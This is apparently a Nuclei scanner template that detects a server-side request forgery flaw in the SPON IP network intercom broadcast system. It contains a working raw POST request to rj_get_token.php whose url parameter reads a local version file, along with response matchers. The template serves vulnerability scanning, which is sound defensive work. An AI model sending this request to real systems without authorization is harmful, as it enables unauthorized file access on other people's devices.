id: SPON-IP-SSRF

info:
  name: SPON IP 网络对讲广播系统 SSRF漏洞
  author: Str1am
  severity: high
  reference: https://poc.shuziguanxing.com/?#/publicIssueInfo#issueId=4578
  tags: SPON,SSRF

requests:
  - raw:
      - |
        POST /php/rj_get_token.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        
        jsondata[url]=../lan/version.txt

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "v1.x 3.31 RELEASE"
        part: body
        condition: and